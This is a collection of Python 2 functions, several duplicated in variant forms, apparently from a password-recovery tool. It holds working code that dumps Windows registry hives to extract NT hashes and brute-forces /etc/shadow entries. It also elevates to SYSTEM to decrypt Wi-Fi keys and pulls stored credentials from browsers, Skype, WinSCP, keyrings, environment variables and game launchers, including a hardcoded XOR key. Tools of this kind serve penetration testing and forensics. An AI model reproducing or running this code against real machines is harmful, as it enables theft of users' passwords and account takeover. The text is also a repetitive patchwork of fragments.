def run(self):
# Need admin privileges
if not windll.Shell32.IsUserAnAdmin():
if logging.getLogger().isEnabledFor(logging.INFO) == True:
Header().title('Windows Secrets')
print_debug('WARNING', '[!] This script should be run as admin!')
return
# print the title
Header().title('Windows Secrets')
# if hives already exists
if self.check_existing_systemFiles():
self.delete_existing_systemFiles() # delete it
# save system hives
for f in self.sysFile:
subprocess.Popen('reg.exe save hklm\%s %s.save' % (f,f) , shell=True, stdout=subprocess.PIPE).stdout.read()
if not self.check_existing_systemFiles():
print_debug('WARNING', 'Remove existing hive files and launch it again.')
return
retrieve_hash(self.address, '%s.save' % self.sysFile[2], '%s.save' % self.sysFile[1], '%s.save' % self.sysFile[0], self.ntds, self.history)
# remove hives files
self.delete_existing_systemFiles()
def run(self):
# Need admin privileges
if not windll.Shell32.IsUserAnAdmin():
if logging.getLogger().isEnabledFor(logging.INFO) == True:
Header().title('Windows Secrets')
print_debug('WARNING', '[!] This script should be run as admin!')
return
# print the title
Header().title('Windows Secrets')
# if hives already exists
if self.check_existing_systemFiles():
self.delete_existing_systemFiles() # delete it
# save system hives
for f in self.sysFile:
try:
subprocess.Popen('reg.exe save hklm\%s %s.save' % (f, f),
shell=True,
stdout=subprocess.PIPE).stdout.read()
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('ERROR', 'Failed to save %s hive' % f)
return
def retrieve_password(self):
# print the title
Header().title_debug('Wifi (from Network Manager)')
directory = '/etc/NetworkManager/system-connections'
if os.path.exists(directory):
if os.getuid() != 0:
print_debug('INFO', 'You need more privileges (run it with sudo)\n')
wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))]
pwdFound = []
for w in wireless_ssid:
cp = RawConfigParser()
cp.read(os.path.join(directory, w))
values = {}
values['SSID'] = w
if cp.sections():
for section in cp.sections():
if 'wireless' in section:
for i in cp.items(section):
values[i[0]] = i[1]
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
print_output('Wifi', pwdFound)
else:
print_debug('ERROR', 'the path "%s" does not exist' %(directory))
def retrieve_password(self):
# print title
Header().title_debug('SQL Developer')
mainPath = self.get_mainPath()
if mainPath == 'Error':
print_debug('ERROR',
'The APPDATA environment variable is not definded.')
elif mainPath == 'SQL_NOT_EXISTS':
print_debug('INFO', 'SQL Developer not installed.')
elif mainPath == 'SQL_NO_PASSWD':
print_debug('INFO', 'No passwords found.')
else:
passphrase = self.get_passphrase(mainPath)
if passphrase == 'Not_Found':
print_debug(
'ERROR',
'The passphrase used to encrypt has not been found.')
elif passphrase == 'xml_Not_Found':
print_debug(
'ERROR',
'The xml file containing the passphrase has not been found.'
)
else:
salt = self.get_salt()
self.get_infos(mainPath, passphrase, salt)
def run(self):
# print the title
Header().title_info('Opera')
# retrieve opera folder
path = self.get_path()
if not path:
print_debug('INFO', 'Opera not installed.')
return
passwords = ''
# check the use of master password
if not os.path.exists(path + os.sep + 'operaprefs.ini'):
print_debug(
'INFO',
'The preference file operaprefs.ini has not been found.')
else:
if self.masterPasswordUsed(path) == '0':
print_debug('INFO', 'No master password defined.')
elif self.masterPasswordUsed(path) == '1':
print_debug('WARNING', 'A master password is used.')
else:
print_debug(
'WARNING',
'An error occurs, the use of master password is not sure.')
print
passwords = self.decipher_old_version(path)
if passwords:
self.parse_results(passwords)
else:
print_debug('INFO', 'The wand.dat seems to be empty')
def run(self):
Header().title_info('System account (from /etc/shadow)')
# check root access
if self.root_access():
if self.check_file_access():
shadowFile = open (self.filestr,'r')
for line in shadowFile.readlines():
_hash = line.replace('\n', '')
line = _hash.split(':')
# check if a password is defined
if not line[1] in [ 'x', '*','!' ]:
user = line[0]
cryptPwd = line[1]
# save each hash non empty
self.hash += _hash + '\n'
# try dictionary and bruteforce attack
self.attack(user, cryptPwd)
values = {'Category' : 'Hash', 'Hash' : self.hash }
self.pwdFound.append(values)
# print the results
print_output('System account (from /etc/shadow)', self.pwdFound)
def print_output(software_name, pwdFound):
if pwdFound:
# if the debug logging level is not apply => print the title
if logging.getLogger().isEnabledFor(logging.DEBUG) == False:
Header().title_info(software_name)
toWrite = []
for pwd in pwdFound:
lower_list = [s.lower() for s in pwd.keys()]
password = [s for s in lower_list if "password" in s]
key = [s for s in lower_list if "key" in s] # for the wifi
# No password found
if not password and not key:
print_debug("FAILED", "Password not found !!!")
else:
print_debug("OK", "Password found !!!")
toWrite.append(pwd)
constant.nbPasswordFound += 1
for p in pwd.keys():
logging.info("%s: %s" % (p, pwd[p]))
print
# write credentials into a text file
checks_write(toWrite, software_name)
else:
logging.debug("[!] No passwords found\n")
def hashes_to_dic(self, title, format, content):
Header().title1(title)
print_debug('INFO', 'Format: (%s)' % format)
items = sorted(content)
pwdFound = []
values = {}
all_hash = '\r\n'
for item in items:
hash = content[item]
(uid, rid, lmhash, nthash) = hash.split(':')[:4]
self.wordlist.append(uid.encode("utf8"))
all_hash = '%s\r\n%s' % (all_hash, hash)
password = self.bruteForce_Hash(nthash)
# if a password has been found from the dictionary attack
if password:
accounts = {}
accounts['Category'] = 'System account'
accounts['user'] = uid
accounts['password'] = password
pwdFound.append(accounts)
values['hashes'] = all_hash
pwdFound.append(values)
return pwdFound
def retrieve_password(self):
# print title
Header().title_debug('Wifi')
if not windll.Shell32.IsUserAnAdmin():
print_debug('ERROR', '[!] This script should be run as admin!')
return
else:
if 'ALLUSERSPROFILE' in os.environ:
directory = os.environ[
'ALLUSERSPROFILE'] + os.sep + 'Microsoft\Wlansvc\Profiles\Interfaces'
else:
print_debug(
'ERROR',
'Environment variable (ALLUSERSPROFILE) has not been found.'
)
return
if not os.path.exists(directory):
print_debug(
'INFO',
'No credentials found.\nFile containing passwords not found:\n%s'
% directory)
return
try:
print_debug('INFO', '[!] Trying to elevate our privilege')
get_system_priv()
print_debug(
'INFO',
'[!] Elevation ok - Passwords decryption is in progress')
except:
print_debug(
'ERROR',
'[!] An error occurs during the privilege elevation process. Wifi passwords have not been decrypted'
)
time.sleep(5)
# read temp file containing all passwords found
pwdFound = []
filepath = tempfile.gettempdir() + os.sep + 'TEMP123A.txt'
if os.path.exists(filepath):
cp = RawConfigParser()
cp.read(filepath)
for section in cp.sections():
values = {}
for c in cp.items(section):
values[str(c[0])] = str(c[1])
pwdFound.append(values)
# remove file on the temporary directory
os.remove(filepath)
# print the results
print_output("Wifi", pwdFound)
else:
print_debug('INFO', 'No passwords found')
def run(self):
# print title
Header().title_info('Dot Net Passport')
a = self.get_creds()
pwd = ''
pwdFound = []
if a:
for i in a:
values = {}
if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD:
cipher_text = i['CredentialBlob']
pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy())
if pwd != 'failed':
values['TargetName'] = i['TargetName']
if i['UserName'] is not None:
values['Username'] = i['UserName']
try:
values['Password'] = pwd.decode('utf16')
except Exception,e:
print_debug('DEBUG', '{0}'.format(e))
values['INFO'] = 'Error decoding the password'
pwdFound.append(values)
# print the results
print_output('Dot Net Passport', pwdFound)
def run(self):
# print the title
Header().title_debug('SQL Developer')
mainPath = self.get_mainPath()
if mainPath == 'SQL_NOT_EXISTS':
print_debug('INFO', 'SQL Developer not installed.')
elif mainPath == 'SQL_NO_PASSWD':
print_debug('INFO', 'No passwords found.')
else:
passphrase = self.get_passphrase(mainPath)
if passphrase == 'Not_Found':
print_debug(
'WARNING',
'The passphrase used to encrypt has not been found.')
elif passphrase == 'xml_Not_Found':
print_debug(
'WARNING',
'The xml file containing the passphrase has not been found.'
)
else:
salt = self.get_salt()
self.get_infos(mainPath, passphrase, salt)
def run(self):
# print title
Header().title_info('Kalypso Media Launcher')
creds = []
key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89'
if 'APPDATA' in os.environ:
inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini'
else:
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
return
# The actual user details are stored in *.userdata files
if not os.path.exists(inifile):
print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.')
return
config = ConfigParser.ConfigParser()
config.read(inifile)
values = {}
values['Login'] = config.get('styx user','login')
# get the encoded password
cookedpw = base64.b64decode(config.get('styx user','password'));
values['Password'] = self.xorstring(cookedpw, key)
creds.append(values)
print_output("Kalypso Media Launcher", creds)
def run(self):
# print the title
Header().title_debug('Gnome keyring')
if os.getuid() == 0:
print_debug('INFO', 'Do not run with root privileges)\n')
return
try:
import gnomekeyring
if len(gnomekeyring.list_keyring_names_sync()) > 0:
pwdFound = []
for keyring in gnomekeyring.list_keyring_names_sync():
for id in gnomekeyring.list_item_ids_sync(keyring):
values = {}
item = gnomekeyring.item_get_info_sync(keyring, id)
attr = gnomekeyring.item_get_attributes_sync(
keyring, id)
if attr:
if item.get_display_name():
values["Item"] = item.get_display_name()
if attr.has_key('server'):
values["Server"] = attr['server']
if attr.has_key('protocol'):
values["Protocol"] = attr['protocol']
if attr.has_key('unique'):
values["Unique"] = attr['unique']
if attr.has_key('domain'):
values["Domain"] = attr['domain']
if attr.has_key('origin_url'):
values["Origin_url"] = attr['origin_url']
if attr.has_key('username_value'):
values["Username"] = attr['username_value']
if attr.has_key('user'):
values["Username"] = attr['user']
if item.get_secret():
values["Password"] = item.get_secret()
# write credentials into a text file
if len(values) != 0:
pwdFound.append(values)
# print the results
print_output('Gnome keyring', pwdFound)
else:
print_debug('WARNING', 'The Gnome Keyring wallet is empty')
except Exception, e:
print_debug(
'ERROR',
'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
def retrieve_password(self):
# print title
Header().title_debug('FTP Navigator')
path = "C:\\FTP Navigator\\Ftplist.txt"
if os.path.exists(path):
self.read_file(path)
else:
print_debug('INFO', 'Paht %s does not exist.\nFTP Navigator not installed or not found.' % path)
def run(self):
# print the title
Header().title_info('Jitsi')
file_properties = self.get_path()
if file_properties == 'JITSI_NOT_EXISTS':
print_debug('INFO', 'Jitsi not installed.')
else:
self.get_info(file_properties)
def run(self):
# print title
Header().title_info('Puttycm')
try:
database_path = self.get_default_database()
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug('INFO', 'Puttycm not installed')
return
def run(self, historic=''):
# print title
Header().title_info('Internet Explorer')
# write the binary file
try:
self.write_binary_file()
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
print_debug(
'ERROR',
'%s cannot be created, check your file permission' % dll_name)
def run(self):
# print title
Header().title_info('Skype')
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Skype'
if os.path.exists(directory):
# retrieve the key used to build the salt
key = self.get_regkey()
if key == 'failed':
print_debug('ERROR', 'The salt has not been retrieved')
else:
pwdFound = []
for d in os.listdir(directory):
if os.path.exists(directory + os.sep + d + os.sep +
'config.xml'):
values = {}
try:
values['username'] = d
# get encrypted hash from the config file
enc_hex = self.get_hash_credential(
directory + os.sep + d + os.sep +
'config.xml')
if enc_hex == 'failed':
print_debug(
'WARNING',
'No credential stored on the config.xml file.'
)
else:
# decrypt the hash to get the md5 to brue force
values['hash_md5'] = self.get_md5_hash(
enc_hex, key)
values['shema to bruteforce'] = values[
'username'] + '\\nskyper\\n<password>'
# Try a dictionary attack on the hash
password = self.dictionary_attack(
values['username'], values['hash_md5'])
if password:
values['password'] = password
pwdFound.append(values)
except Exception, e:
print_debug('DEBUG', '{0}'.format(e))
# print the results
print_output("Skype", pwdFound)
else:
print_debug('INFO', 'Skype not installed.')
def run(self):
# print title
Header().title_debug('WinSCP')
if self.check_winscp_installed():
if not self.check_masterPassword():
r = self.get_logins_info()
if r == False:
print_debug('INFO', 'WinSCP not installed.')
else:
print_debug('WARNING', 'A master password is used. Passwords cannot been retrieved')
else:
print_debug('INFO', 'WinSCP not installed.')
def run(self):
Header().title_info('Wifi (from WPA Supplicant)')
if self.check_file_access():
return
# check root access
if os.getuid() != 0:
print_debug('INFO',
'You need more privileges (run it with sudo)\n')
return
pwdFound = self.parse_file()
print_output("wpa_supplicant", pwdFound)
def run(self):
# print title
Header().title_info('Cyberduck')
path = self.get_path()
if path == 'CYBERDUCK_NOT_EXISTS':
print_debug('INFO', 'Cyberduck not installed.')
elif path == 'User_profil_not_found':
print_debug('INFO', 'User profil has not been found.')
elif path == 'APPDATA_NOT_FOUND':
print_debug('ERROR', 'The APPDATA environment variable is not defined.')
else:
self.parse_xml(path)
def run(self):
# print the title
Header().title_debug('DbVisualizer')
mainPath = self.get_mainPath()
if mainPath == 'DBVIS_NOT_EXISTS':
print_debug('INFO', 'DbVisualizer not installed.')
else:
passphrase = self.get_passphrase()
salt = self.get_salt()
self.get_infos(mainPath, passphrase, salt)
def run(self):
# print title
Header().title_info('Jitsi')
file_properties = self.get_path()
if file_properties == 'Error':
print_debug('ERROR',
'The APPDATA environment variable is not defined')
elif file_properties == 'JITSI_NOT_EXISTS':
print_debug('INFO', 'Jitsi not installed.')
else:
self.get_info(file_properties)
def retrieve_password(self):
# print title
Header().title_debug('Skype')
if 'APPDATA' in os.environ:
directory = os.environ['APPDATA'] + '\Skype'
if os.path.exists(directory):
# retrieve the key used to build the salt
key = self.get_regkey()
if key == 'failed':
print_debug('ERROR', 'The salt has not been retrieved')
else:
pwdFound = []
for d in os.listdir(directory):
if os.path.exists(directory + os.sep + d + os.sep +
'config.xml'):
values = {}
try:
values['Username'] = d
# get encrypted hash from the config file
enc_hex = self.get_hash_credential(
directory + os.sep + d + os.sep +
'config.xml')
if enc_hex == 'failed':
print_debug(
'WARNING',
'No credential stored on the config.xml file.'
)
else:
# decrypt the hash to get the md5 to brue force
values['Hash_md5'] = self.get_md5_hash(
enc_hex, key)
values['shema to bruteforce'] = values[
'Username'] + '\\nskyper\\n<password>'
pwdFound.append(values)
except:
pass
# print the results
print_output("Skype", pwdFound)
else:
print_debug('INFO', 'Skype not installed.')
else:
print_debug('ERROR',
'The APPDATA environment variable is not defined.')
def retrieve_password(self):
# print title
Header().title_debug('Puttycm')
try:
database_path = self.get_default_database()
except:
print_debug('INFO', 'Puttycm not installed')
return
if os.path.exists(database_path):
self.parse_xml(database_path)
else:
print_debug('ERROR',
'Default database does not exist: %s' % database_path)
def run(self):
# print title
Header().title_info('FTP Navigator')
if 'HOMEDRIVE' in os.environ:
path = os.environ.get(
'HOMEDRIVE') + os.sep + 'FTP Navigator\\Ftplist.txt'
if os.path.exists(path):
self.read_file(path)
else:
print_debug(
'INFO',
'Paht %s does not exist.\nFTP Navigator not installed or not found.'
% path)
def retrieve_password(self):
# print title
Header().title_debug('Squirrel')
path = self.get_path()
if path == 'Not_Found':
print_debug('INFO', 'Squirrel not installed')
elif path == 'var_Env_Not_Found':
print_debug('ERROR', 'The HOMEPATH environment variable is not definded.')
else:
path += os.sep + 'SQLAliases23.xml'
if os.path.exists(path):
self.parse_xml(path)
else:
print_debug('ERROR', 'xml fil SQLAliases23.xml containing passwords has not be found')
def retrieve_password(self):
# print the title
Header().title_debug('Squirrel')
path = self.get_path()
if path == 'Not_Found':
print_debug('INFO', 'Squirrel not installed')
else:
path += os.sep + 'SQLAliases23.xml'
if os.path.exists(path):
self.parse_xml(path)
else:
print_debug('WARNING',
'xml file containing passwords has not be found')
def retrieve_password(self):
values = {}
pwdFound = []
# print the title
Header().title_debug('Environnement variables')
# --------- http_proxy --------
tmp = ''
if 'http_proxy' in os.environ:
tmp = 'http_proxy'
elif 'HTTP_Proxy' in os.environ:
tmp = 'HTTP_Proxy'
if tmp:
values["Variable"] = tmp
values["Password"] = os.environ[tmp]
pwdFound.append(values)
# --------- https_proxy --------
tmp = ''
if 'https_proxy' in os.environ:
tmp = 'https_proxy'
elif 'HTTPS_Proxy' in os.environ:
tmp = 'HTTPS_Proxy'
if tmp:
values["Variable"] = tmp
values["Password"] = os.environ[tmp]
pwdFound.append(values)
tab = ['passwd', 'pwd', 'pass', 'password']
for i in os.environ:
for t in tab:
if (t.upper() in i.upper()) and (i.upper() != 'PWD') and (
i.upper() != 'OLDPWD'):
values["Variable"] = i
values["Password"] = os.environ[i]
pwdFound.append(values)
# write credentials into a text file
if len(values) != 0:
# print the results
print_output('Environnement variables', pwdFound)
else:
print_debug('INFO',
'No passwords stored in the environment variables.')
def run(self):
# print title
Header().title_info('Galcon Fusion')
creds = []
# Find the location of steam - to make it easier we're going to use a try block
# 'cos I'm lazy
try:
with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key:
results=QueryValueEx(key, 'SteamPath')
except:
print_debug('INFO', 'Steam does not appear to be installed.')
return
if not results:
print_debug('INFO', 'Steam does not appear to be installed.')
return
steampath=results[0]
userdata = steampath + '\\userdata'
# Check that we have a userdata directory
if not os.path.exists(userdata):
print_debug('ERROR', 'Steam doesn\'t have a userdata directory.')
return
# Now look for Galcon Fusion in every user
files = os.listdir(userdata)
for file in files:
filepath = userdata + '\\' + file + '\\44200\\remote\\galcon.cfg'
if not os.path.exists(filepath):
continue
# If we're here we should have a Galcon Fusion file
with open(filepath, mode='rb') as cfgfile:
# We've found a config file, now extract the creds
data = cfgfile.read()
values = {}
values['Login'] = data[4:0x23]
values['Password'] = data[0x24:0x43]
creds.append(values)
print_output("Galcon Fusion", creds)
